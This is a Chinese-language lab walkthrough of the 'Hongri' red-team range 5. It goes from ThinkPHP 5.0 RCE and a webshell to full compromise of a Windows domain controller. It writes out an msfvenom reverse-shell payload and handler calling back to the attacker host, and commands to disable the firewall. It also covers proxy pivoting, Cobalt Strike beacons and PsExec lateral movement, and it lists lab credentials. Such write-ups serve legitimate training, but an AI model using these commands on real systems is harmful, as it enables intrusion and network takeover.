ATT&CK红队评估(红日靶场五)
字数 1329 2025-08-12 11:34:19

ATT&CK红队评估(红日靶场五)渗透测试教学文档

靶场环境搭建

靶场组成

  • 两台主机:
    • DC (Windows Server 2008) - 域控制器
    • WIN7 (Windows 7) - 双网卡主机
  • 攻击机:Kali Linux

网络配置

  • WIN7主机:
    • 内网网卡IP:192.168.138.136
    • 外网网卡IP:192.168.135.150
  • WIN2008 (DC):
    • 内网IP:192.168.138.138
  • Kali攻击机:
    • 应与WIN7外网网卡同网段(192.168.135.0/24)
    • NAT模式

登录凭证

  • WIN7:
    • 本地用户:sun\heart 123.com
    • 管理员:sun\Administrator dc123.com
  • 域控:
    • sun\admin 2020.com

渗透测试流程

1. 信息收集与初始访问

  1. 端口扫描

    nmap -sS -p 1-65535 -A 192.168.135.150
    
    • 发现开放80端口(ThinkPHP)和3306端口(MySQL)
  2. 利用ThinkPHP漏洞

    • ThinkPHP 5.0存在远程代码执行漏洞
    • 使用工具验证:ThinkphpGUI
    • 获取Webshell后使用蚁剑连接

2. 建立持久访问

  1. 生成并上传Meterpreter木马
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.136 LPORT=5555 -f exe > shell.exe
    
  2. MSF设置监听
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.135.136
    set LPORT 5555
    exploit
    
  3. 通过蚁剑终端执行shell.exe获取会话

3. 权限提升与持久化

  1. 提权
    getsystem
    
  2. 进程迁移
    ps  # 查看进程
    migrate <PID>  # 迁移到稳定进程
    
  3. 关闭防火墙
    NetSh Advfirewall set allprofiles state off
    

4. 内网渗透

  1. 内网信息收集

    ipconfig /all
    
    • 发现内网网段:192.168.138.0/24
    • 域名:sun.com
  2. 添加路由

    route add 192.168.138.0 255.255.255.0 2
    
  3. 建立代理

    use auxiliary/server/socks_proxy
    set SRVHOST 127.0.0.1
    set VERSION 4a
    exploit
    
    • 编辑/etc/proxychains4.conf添加socks代理
  4. 使用Cobalt Strike

    • 建立监听器
    • 生成并上传CS木马
    • 提权后设置睡眠时间为0
    • 使用net view查看域和计算机列表

5. 横向移动

  1. 使用fscan扫描内网

    • 发现域控(192.168.138.138)开放445,139,88,135端口
  2. 使用PsExec横向移动

    • 在CS中新建beacon_smb监听器
    • 通过psexec拿下域控主机

关键工具与技术

  1. 漏洞利用工具

    • ThinkphpGUI (针对ThinkPHP 5.0 RCE)
    • Metasploit Framework (生成payload和监听)
    • Cobalt Strike (高级内网渗透)
  2. 信息收集工具

    • Nmap (端口扫描)
    • fscan (内网扫描)
  3. 横向移动技术

    • PsExec (通过SMB协议执行命令)
    • Mimikatz (凭证获取)
  4. 代理技术

    • MSF socks_proxy模块
    • Proxychains配置

注意事项

  1. 在实际渗透中,关闭防火墙等操作可能会触发安全警报
  2. 进程迁移应选择稳定的系统进程(如explorer.exe)
  3. 横向移动前应充分收集目标信息,避免盲目攻击
  4. 使用代理时注意配置正确,确保流量能正确路由
  5. 域渗透中,优先获取域管理员凭证可大幅简化后续操作

总结

本渗透测试从外网Web应用漏洞入手,通过ThinkPHP RCE获取初始立足点,建立持久访问后向内网扩展,最终通过PsExec技术拿下域控主机。整个过程涵盖了外网渗透、内网横向移动、权限提升和域渗透等红队评估关键环节。

ATT&CK红队评估(红日靶场五)渗透测试教学文档 靶场环境搭建 靶场组成 两台主机: DC (Windows Server 2008) - 域控制器 WIN7 (Windows 7) - 双网卡主机 攻击机:Kali Linux 网络配置 WIN7主机: 内网网卡IP:192.168.138.136 外网网卡IP:192.168.135.150 WIN2008 (DC): 内网IP:192.168.138.138 Kali攻击机: 应与WIN7外网网卡同网段(192.168.135.0/24) NAT模式 登录凭证 WIN7: 本地用户:sun\heart 123.com 管理员:sun\Administrator dc123.com 域控: sun\admin 2020.com 渗透测试流程 1. 信息收集与初始访问 端口扫描 : 发现开放80端口(ThinkPHP)和3306端口(MySQL) 利用ThinkPHP漏洞 : ThinkPHP 5.0存在远程代码执行漏洞 使用工具验证: ThinkphpGUI 获取Webshell后使用蚁剑连接 2. 建立持久访问 生成并上传Meterpreter木马 : MSF设置监听 : 通过蚁剑终端执行shell.exe获取会话 3. 权限提升与持久化 提权 : 进程迁移 : 关闭防火墙 : 4. 内网渗透 内网信息收集 : 发现内网网段:192.168.138.0/24 域名:sun.com 添加路由 : 建立代理 : 编辑/etc/proxychains4.conf添加socks代理 使用Cobalt Strike : 建立监听器 生成并上传CS木马 提权后设置睡眠时间为0 使用 net view 查看域和计算机列表 5. 横向移动 使用fscan扫描内网 : 发现域控(192.168.138.138)开放445,139,88,135端口 使用PsExec横向移动 : 在CS中新建beacon_ smb监听器 通过psexec拿下域控主机 关键工具与技术 漏洞利用工具 : ThinkphpGUI (针对ThinkPHP 5.0 RCE) Metasploit Framework (生成payload和监听) Cobalt Strike (高级内网渗透) 信息收集工具 : Nmap (端口扫描) fscan (内网扫描) 横向移动技术 : PsExec (通过SMB协议执行命令) Mimikatz (凭证获取) 代理技术 : MSF socks_ proxy模块 Proxychains配置 注意事项 在实际渗透中,关闭防火墙等操作可能会触发安全警报 进程迁移应选择稳定的系统进程(如explorer.exe) 横向移动前应充分收集目标信息,避免盲目攻击 使用代理时注意配置正确,确保流量能正确路由 域渗透中,优先获取域管理员凭证可大幅简化后续操作 总结 本渗透测试从外网Web应用漏洞入手,通过ThinkPHP RCE获取初始立足点,建立持久访问后向内网扩展,最终通过PsExec技术拿下域控主机。整个过程涵盖了外网渗透、内网横向移动、权限提升和域渗透等红队评估关键环节。